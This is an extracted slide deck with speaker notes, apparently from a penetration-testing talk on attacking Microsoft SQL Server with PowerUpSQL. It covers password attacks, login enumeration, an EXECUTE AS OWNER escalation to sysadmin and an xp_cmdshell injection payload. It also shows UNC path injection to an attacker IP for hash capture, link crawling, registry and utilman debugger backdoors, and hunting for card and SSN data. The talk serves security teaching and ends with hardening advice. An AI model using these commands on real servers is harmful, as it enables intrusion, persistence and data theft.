  • 25. Escalating Privileges: Weak PWs Didn’t we just cover this? Yes, but there’s more… Attacker Perspective Attack PowerUpSQL Function Example Unauthenticated Dictionary Attacks Invoke-SQLAuditWeakLoginPw –Instance “Server1Instance1” -UserFile c:tempusers.txt –PassFile C:tempPasswords.txt Unauthenticated Default Vendor Passwords Get-SQLInstanceFile C:tempComputers.txt | Select Computername | Get-SQLInstanceScanUDPThreaded –Verbose | Get-SQLServerLoginDefaultPw -Verbose Domain Account Excessive Login Priv Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw – Verbose
  • 26. Escalating Privileges: Weak PWs …we can also enumerate SQL Server logins and Domain Accounts  Technique PowerUpSQL Function Blind Login Enumeration + Dictionary Attack = Super Cool! Invoke-SQLAuditWeakLoginPw • Enumerate all SQL Server logins with the Public role • Enumerate all domain accounts with the Public role
  • 27. Escalating Privileges: Weak PWs Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail.
  • 28. Escalating Privileges: Weak PWs Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail. 2. Get principal id for the sa account with “suser_id”
  • 29. Escalating Privileges: Weak PWs Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail. 2. Get principal id for the sa account with “suser_id” 3. Use “suser_name” to get SQL logins using just principal ID
  • 30. Escalating Privileges: Weak PWs Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail. 2. Get principal id for the sa account with “suser_id” 3. Use “suser_name” to get SQL logins using just principal ID 4. Increment number and repeat
  • 31. Escalating Privileges: Weak PWs Enumerating SQL Logins 1. Attempt to list all SQL Server logins and fail. 2. Get principal id for the sa account with “suser_id” 3. Use “suser_name” to get SQL logins using just principal ID 4. Increment number and repeat select n [id], SUSER_NAME(n) [user_name] from ( select top 10000 row_number() over(order by t1.number) as N from master..spt_values t1 cross join master..spt_values t2 ) a where SUSER_NAME(n) is not null Code gifted from @mobileck Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
  • 32. Escalating Privileges: Weak PWs Enumerating Domain Users 1. Get the domain Domain of SQL Server
  • 33. Escalating Privileges: Weak PWs Enumerating Domain Users 1. Get the domain 2. GID RID of default group Full RID of Domain Admins group
  • 34. Escalating Privileges: Weak PWs Enumerating Domain Users 1. Get the domain 2. GID RID of default group 3. Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
  • 35. Escalating Privileges: Weak PWs Enumerating Domain Users 1. Get the domain 2. GID RID of default group 3. Grab the first 48 Bytes of the full RID 4. Create new RID with by appending a hex number value and the SID 1. Start with number, 500 2. Convert to hex, F401 3. Pad with 0 to 8 bytes, F4010000 4. Concatenate the SID and the new RID SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0 RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
  • 36. Escalating Privileges: Weak PWs Enumerating Domain Users 1. Get the domain 2. GID RID of default group 3. Grab the first 48 Bytes of the full RID 4. Create new RID with by appending a hex number value and the SID 5. Use “suser_name” function to get domain object name 1. Start with number, 500 2. Convert to hex, F401 3. Pad with 0 to 8 bytes, F4010000 4. Concatenate the SID and the new RID SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0 RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
  • 37. Escalating Privileges: Weak PWs Enumerating Domain Users 1. Get the domain 2. GID RID of default group 3. Grab the first 48 Bytes of the full RID 4. Create new RID with by appending a hex number value and the SID 5. Use “suser_name” function to get domain object name 6. Increment and repeat 1. Start with number, 500 2. Convert to hex, F401 3. Pad with 0 to 8 bytes, F4010000 4. Concatenate the SID and the new RID SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0 RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0F4010000
  • 39.
  • 40. Escalating Privileges: Impersonation 1. Impersonate Privilege • Server: EXECUTE AS LOGIN • Database: EXECUTE AS USER 2. Stored Procedure and Trigger Creation / Injection Issues • EXECUTE AS OWNER • Signed with cert login 3. Automatic Execution of Stored Procedures 4. Agent Jobs • User, Reader, and Operator roles 5. xp_cmdshell proxy acount 6. Create Databse Link to File or Server 7. Import / Install Custom Assemblies 8. Ad-Hoc Queries 9. Shared Service Accounts 10. Database Links 11. UNC Path Injection 12. Python code execution
  • 41. Impersonate Privilege • Can be used at server layer o EXECUTE AS LOGIN • Can be used at database layer o EXECUTE AS USER Pros • Execute queries/commands in another user context Cons • Commands and queries are not limited in any way • Requires database to be configured as trustworthy for OS command execution Escalating Privileges: Impersonation
  • 42. Impersonate Privilege • Can be used at server layer o EXECUTE AS LOGIN • Can be used at database layer o EXECUTE AS USER Escalating Privileges: Impersonation
  • 43. Impersonate Privilege • Can be used at server layer o EXECUTE AS LOGIN • Can be used at database layer o EXECUTE AS USER Escalating Privileges: Impersonation
  • 44. Stored Procedure and Trigger Creation / Injection Issues • EXECUTE AS OWNER can be used to execute a stored procedure as another login Pros • Can execute queries/commands in another user context • Limit commands and queries • Don’t have to grant IMPERSONATE Cons • No granular control over the database owner’s privileges • DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin • Requires database to be configured as trustworthy for OS command execution • Impersonation can be done via SQL injection under specific conditions • Impersonation can be done via command injection under specific conditions Escalating Privileges: Impersonation
  • 45. Stored Procedure and Trigger Creation / Injection Issues • EXECUTE AS OWNER can be used to execute a stored procedure as another login • DB_OWNER role can impersonate the actual database owner USE MyAppDb GO CREATE PROCEDURE sp_escalate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'MyAppUser','sysadmin' GO Escalating Privileges: Impersonation
  • 46. Stored Procedure and Trigger Creation / Injection Issues • EXECUTE AS OWNER can be used to execute a stored procedure as another login • DB_OWNER role can impersonate the actual database owner USE MyAppDb GO CREATE PROCEDURE sp_escalate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'MyAppUser','sysadmin' GO SYSADMIN is often the OWNER Escalating Privileges: Impersonation
  • 47. Stored Procedure and Trigger Creation / Injection Issues • Use signed Procedures o Create stored procedure o Create a database master key o Create a certificate o Create a login from the certificate o Configure login privileges o Sign stored procedure with certifiate o GRANT EXECUTE to User Pros • Can execute queries/commands in another user context • Limit commands and queries • Don’t have to grant IMPERSONATE • Granular control over permissions • Database does NOT have to be configured as trustworthy for OS command execution Cons • Impersonation can be done via SQL injection under specific conditions • Impersonation can be done via command injection under specific conditions Escalating Privileges: Impersonation
  • 48. SQL Injection Example CREATE PROCEDURE sp_sqli2 @DbName varchar(max) AS BEGIN Declare @query as varchar(max) SET @query = ‘ SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''; EXECUTE(@query) END GO https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/ Escalating Privileges: Impersonation
  • 49. SQL Injection Example CREATE PROCEDURE sp_sqli2 @DbName varchar(max) AS BEGIN Declare @query as varchar(max) SET @query = ‘ SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''; EXECUTE(@query) END GO PURE EVIL https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/ Escalating Privileges: Impersonation
  • 50. SQL Injection Example EXEC MASTER.dbo.sp_sqli2 'master'';EXEC master..xp_cmdshell ''whoami''--'; https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/ Escalating Privileges: Impersonation
  • 51. SQL Injection Example Escalating Privileges: Impersonation
  • 52. Automatic Execution of Stored Procedure • Stored procedures ca be configured to execute when the SQL Server service restarts Pros • Marking a stored procedure to run when the SQL Server service restarts has many use cases • Only stored procedures in the master database can be marked for auto execution Cons • No granular control over what context the startup command is executed in • All stored procedures marked for auto execution are executed as ‘sa’, even if ‘sa’ is disabled • Any non sysadmin access to stored procedures can lead to execution as ‘sa’ Escalating Privileges: Impersonation
  • 58. OS Command Execution Through SQL Server = Windows Service Account Impersonation Escalating Privileges: SysAdmin to Win Account
  • 59. You don’t need to know the password, crack a hash, or PTH. Escalating Privileges: SysAdmin to Win Account
  • 60. There are a lot of options for executing OS commands. Escalating Privileges: SysAdmin to Win Account
  • 61. Add invoke-sqloscmdclr and agents Technique Configuration Change Requires Sysadmin Requires Disk Read/Write Notes xp_cmdshell Yes Yes No sp_configure ‘xp_cmdshell', 1; RECONFIGURE; Can be configured with proxy account. (sp_xp_cmdshell_proxy_account) Custom Extended Stored Procedure No Yes Yes sp_addextendedproc CLR Assembly Yes No No sp_configure ‘clr enabled', 1; RECONFIGURE; sp_configure ‘clr strict security', 1; RECONFIGURE; -- 2017 Requires: Database has ‘Is_Trustworthy’ flag set. Requires: CREATE ASSEMBLY permission or sysadmin Agent Job: • CmdExec • PowerShell • SSIS • ActiveX: Jscript • ActiveX: VBScript No No No Can be configured with proxy account. Requires one of the roles below: SQLAgentUserRole SQLAgentReaderRole SQLAgentOperatorRole Python Execution Yes Yes No sp_configure 'external scripts enabled', 1; RECONFIGURE; Write to file autorun Yes Yes Yes sp_addlinkedserver Openrowset Opendataset Write to registry autorun Yes Yes Yes xp_regwrite
  • 63. SQL Server can be configured with different account types. Escalating Privileges: SysAdmin to Win Account
  • 64. Service Account Types ● Local User ● Local System ● Network Service ● Local managed service account ● Domain managed service account ● Domain User ● Domain Admin Escalating Privileges: SysAdmin to Win Account
  • 65. Escalating Privileges: Invoke-SQLOSCmd Invoke-SQLOSCMD can be used for basic command execution via xp_cmdshell. PS C:>$Accessible | Invoke-SQLOSCmd –Command “whoami” ComputerName Instance CommandResults --------------------- ----------- -------------- SQLServer1 SQLServer1SQLEXPRESS nt servicemssql$sqlexpress SQLServer1 SQLServer1STANDARDDEV2014 nt authoritysystem SQLServer1 SQLServer1 DomainSQLSvc
  • 67. Escalating Privileges: Shared Svc Accounts Why should I care about shared service accounts? 1. SysAdmins can execute OS commands 2. OS commands run as the SQL Server service account 3. Service accounts have sysadmin privileges by default 4. Companies often use a single domain account to run hundreds of SQL Servers 5. So if you get sysadmin on one server you have it on all of them! One account to rule them all!
  • 68. InternetDMZIntranet LRA HVA LVA ADS LVA Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Key HVA = High Value Application LVA = Low Value Application Leveraging Shared MS SQL Server Service Accounts
  • 69. InternetDMZIntranet LRA HVA LVA ADS LVA Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Key HVA = High Value Application LVA = Low Value Application Leveraging Shared MS SQL Server Service Accounts
  • 70. InternetDMZIntranet LRA HVA LVA ADS LVA Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Execute Local Command via xp_cmdshell 2 Key HVA = High Value Application LVA = Low Value Application Leveraging Shared MS SQL Server Service Accounts
  • 71. InternetDMZIntranet LRA HVA LVA ADS LVA Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Execute Local Command via xp_cmdshell 2 Access to HVA with shared domain service account Key HVA = High Value Application LVA = Low Value Application Execute commands and gather data from other database servers via osql 3 Leveraging Shared MS SQL Server Service Accounts
  • 73. Escalating Privileges: Crawling Links What’s a SQL Server link? ● SQL Server links are basically persistent database connections for SQL Servers. Why should I care? ● Short answer = privilege escalation ● Public role can use links to execute queries on remote servers (impersonation) SELECT * FROM OpenQuery([SQLSERVER2],’SELECT @@Version’) ● Stored procedures can be executed – like xp_cmdshell ;) ● Links can be crawled
  • 74. InternetDMZIntranet LRA HVA LVA ADS Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain EvilKey HVA = High Value Application LVA = Low Value Application Leveraging MS SQL Database links DB1 LVA
  • 75. InternetDMZIntranet LRA HVA LVA ADS Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Key HVA = High Value Application LVA = Low Value Application Leveraging MS SQL Database links DB1 LVA
  • 76. InternetDMZIntranet LRA HVA LVA ADS Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Key HVA = High Value Application LVA = Low Value Application Leveraging MS SQL Database links D B Link w ith LeastPrivileges DB1 LVA
  • 77. InternetDMZIntranet LRA HVA LVA ADS Ports 80 and 443 Ports 1433 and 1434 HVA PURE EVIL Captain Evil SQL Injection 1 Key HVA = High Value Application LVA = Low Value Application Leveraging MS SQL Database links D B Link w ith LeastPrivileges DB Link with SA account DB1 LVA Execute SQL queries and local commands on database servers via nested linked services 2
  • 78. Escalating Privileges: Crawling Links Penetration Test Stats ● Database links exist (and can be crawled) in about 50% of environments we’ve seen ● The max number of hops we’ve seen is 12 ● The max number of servers crawled is 226
  • 79. Escalating Privileges: Crawling Links Old Metasploit Module ● mssql_linkcrawler Module ● Author: Antti Rantasaari and Scott Sutherland - Released 2012 ● https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler New PowerUpSQL Function ● Get-SQLServerLinkCrawl ● Author: Antti Rantasaari ● https://blog.netspi.com/sql-server-link-crawling-powerupsql/
  • 80. Escalating Privileges: Crawling Links Function Description Get-SQLServerLink Get a list of SQL Server Link on the server. Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution. Examples Get-SQLServerLinkCrawl -Verbose -Instance "10.1.1.1SQLSERVER2008“ Get-SQLServerLinkCrawl -Verbose -Instance "10.1.1.1SQLSERVER2008" -Query “select * from master..sysdatabases” Get-SQLServerLinkCrawl -Verbose -Instance "10.1.1.1SQLSERVER2008" -Query “exec master..xp_cmdshell ‘whoami’”
  • 82. DEMO
  • 85. Escalating Privileges: UNC Injection UNC Path Injection Summary ● UNC paths are used for accessing remote file servers like so 192.168.1.4file ● Almost all procedures that accept a file path in SQL Server, support UNC paths ● UNC paths can be used to force the SQL Server service account to authenticate to an attacker ● An attacker can then capture the NetNTLM password hash and crack or relay it ● Relay becomes pretty easy when you know which SQL Servers are using shared accounts
  • 87. Escalating Privileges: UNC Injection The Issue • By DEFAULT, the PUBLIC role can execute at least two procedures that accept a file path xp_dirtree 'attackeripfile‘ xp_fileexists 'attackeripfile‘ The Solution • EXECUTE rights on xp_dirtree and fileexists can be REVOKED for the Public role (but no one does that) UNC Path Injection Cheat Sheet (More options) • https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e
  • 88. Escalating Privileges: UNC Injection Another Issue • The Public role can perform UNC path injection into the BACKUP and RESTORE commands even though it can’t perform the actual backup/restore: BACKUP LOG [TESTING] TO DISK = 'attackeripfile‘ RESTORE LOG [TESTING] FROM DISK = 'attackeripfile' Partial Solution • A patch was released for SQL Server versions 2012 through 2016 https://technet.microsoft.com/library/security/MS16-131 • There is no patch for SQL Server 2000 to 2008
  • 89. Escalating Privileges: UNC Injection So, in summary… 1. The PUBLIC role can access the SQL Server service account NetNTLM password hash by default 2. A ton of domain users have PUBLIC role access 3. Whooray for domain privilege escalation!
  • 91. Escalating Privileges: UNC Path Injection DEMO
  • 93. Escalating Privileges: OS Admin to SysAdmin Two things to remember… 1. Different SQL Server versions can be abused in different ways 2. All SQL Server versions provide the service account with sysadmin privileges.
  • 94. Escalating Privileges: OS Admin to SysAdmin Approach 2000 2005 2008 2012 2014 2016 Read LSA Secrets x x x x x x Dump Wdigest or NTLM password hash from Memory x x x x x x Process Migration (Remote DLL or Shellcode Injection) x x x x x x Steal Authentication Token from SQL Server service process x x x x x x Log into SQL Server as a local administrator x x Log into SQL Server as a LocalSystem x x x Log into SQL Server in Single User Mode as a local administrator ? x x x x x
  • 95. Escalating Privileges: OS Admin to SysAdmin Here are some tool options...Approach Account Password Recovery Account Impersonation Default Sysadmin Privileges Common Tools Read LSA Secrets (Because service accounts) X Mimikatz, Metasploit, PowerSploit, Empire, LSADump Dump Wdigest or NTLM password hash from Memory X Mimikatz, Metasploit, PowerSploit, Empire Note: This tends to fail on protected processes. Process Migration (Remote DLL or Shellcode Injection) X Metasploit, PowerSploit, Empire Python, Powershell, C, C++ Steal Authentication Token from SQL Server service process X Metasploit, Incognito, Invoke-TokenManipulation Log into SQL Server as a local administrator X Any SQL Server client. Note: Only affects older versions. Log into SQL Server as a LocalSystem X Ay SQL Server client and PSExec. Note: Only affects older versions. Log into SQL Server in Single User Mode as a local administrator X DBATools
  • 97.
  • 99. Post Exploitation: Overview Common Post Exploitation Activities 1. Establish Persistence • SQL Server Layer: startup procedures, agent jobs, triggers, modified code • OS Layer: Registry & file auto runs, tasks, services, etc. 2. Identify Sensitive Data • Target large databases • Locate transparently encrypted databases • Search columns based on keywords and sample data • Use regular expressions and the Luhn formula against data samples 3. Exfiltrate Sensitive Data • All standard methods: Copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
  • 100. Post Exploitation: Persistence Task Command Example Registry Autorun Persistence Get-SQLPersistRegRun -Verbose -Name EvilSauce -Command "EvilBoxEvilSandwich.exe" -Instance "SQLServer1STANDARDDEV2014" Debugger Backdoor Persistence Get-SQLPersistRegDebugger -Verbose -FileName utilman.exe -Command 'c:windowssystem32cmd.exe' -Instance "SQLServer1STANDARDDEV2014"
  • 102. Post Exploitation: Finding Data Task Command Example Locate Encrypted Databases Get-SQLInstanceDomain -Verbose | Get-SQLDatabaseThreaded –Verbose –Threads 10 -NoDefaults | Where-Object {$_.is_encrypted –eq “TRUE”} Locate and Sample Sensitive Columns and Export to CSV Get-SQLInstanceDomain -Verbose | Get-SQLColumnSampleDataThreaded –Verbose –Threads 10 –Keyword “credit,ssn,password” –SampleSize 2 –ValidateCC –NoDefaults | Export-CSV –NoTypeInformation c:tempdatasample.csv
  • 103. Post Exploitation: DEMO Hunting for Sensitive Data
  • 104. Post Exploitation: Finding Sensitive Data DEMO
  • 106. General Recommendations 1. Enforce least privilege everywhere! 2. Disable dangerous default stored procedures. 3. Install security patches or upgrade to latest version. 4. Audit and fix insecure configurations. 5. Use policy based management for standardizing configurations. 6. Enable auditing at the server and database levels, and monitor for potentially malicious activity.
  • 107. Take Aways 1. SQL Server is everywhere 2. SQL Server has many trust relationships with Windows and Active Directory 3. SQL Server has many default and common configurations that can be exploited to gain access 4. Tons of domain users have the ability to login into SQL Server 5. Service accounts have sysadmin privileges 6. Shared service accounts can be dangerous 7. PowerUpSQL can be used for basic auditing and exploiting of common SQL Server issues @_nullbind https://github.com/netspi/PowerUpSQL
  • 108. PowerUpSQL Overview: Thanks! Individual Third Party Code / Direct Contributors Boe Prox Runspace blogs Warren F. ( RamblingCookieMonster) Invoke-Parallel function Oyvind Kallstad Test-IsLuhnValid function Kevin Robertson Invoke-Inveigh Joe Bialek Invoke-TokenManipulation Antti Rantasaari, Eric Gruber, and Alexander Leary, @leoloobeek, and @ktaranov Contributions and QA Khai Tran Design advice NetSPI assessment team and dev team Design advice
  • 109. Questions? Name: Scott Sutherland Job: Network & Application Pentester @ NetSPI Twitter: @_nullbind Slides: http://slideshare.net/nullbind http://slideshare.net/netspi Blogs: https://blog.netspi.com/author/scott-sutherland/ Code: https://github.com/netspi/PowerUpSQL https://github.com/nullbind

Notes de l'éditeur

  1. COMMON USE CASES phishing - clickonce, java applet, macro in office Sql injection download craddle
  2. Skip
  3. Skip
  4. Skip
  5. Skip
  6. Cornucopia of excessive privileges.
  7. Cornucopia of excessive privileges.
  8. Cornucopia of excessive privileges.
  9. Cornucopia of excessive privileges.
  10. Cornucopia of excessive privileges.
  11. Cornucopia of excessive privileges.
  12. Cornucopia of excessive privileges.
  13. Cornucopia of excessive privileges.
  14. Cornucopia of excessive privileges.
  15. Cornucopia of excessive privileges.
  16. Cornucopia of excessive privileges.
  17. Cornucopia of excessive privileges.
  18. Cornucopia of excessive privileges.
  19. Cornucopia of excessive privileges.
  20. Cornucopia of excessive privileges.
  21. Cornucopia of excessive privileges.
  22. Cornucopia of excessive privileges.
  23. Cornucopia of excessive privileges. You get sysadmins.
  24. Architecture overview.
  25. SQL injection.
  26. Scenario Database account with excessive privileges Shared service account Use xp_cmdshell to verify local command execution
  27. Use xp_cmdshell and OSQL to: Enumerate databases on the internal network Issues queries on remote HVA database server that is configured with the same service account. No alerts – using trusted account and non destructive native functionality No logs (or few logs) – No account creation or group modification No accountability!
  28. Another REALLY COOL lateral movement / privilege escalation technique.
  29. Architecture overview.
  30. Scenario No sysadmin role No excessive service account access No shared service account access Enumerate linked servers Find link to DB1 - Used to transmit marketing metrics to DB1
  31. Connect to DB1 (linked server) via OPENQUERY Has least privilege Enumerate linked servers Find link to HVA - Used to pull marketing metrics to DB1
  32. Connect to HVA (linked server) via NESTED OPENQUERY Configured with the SA account HVA could have access to other resources Nesting can continue Nested  Shared service account with excessive privs Linked database can be direct between high value and low value Other server not on the diagram Can be nested many times
  33. Neo4j Bloodhound pending
  34. Here’s the good one 
  35. Cornucopia of excessive privileges.
  36. Skip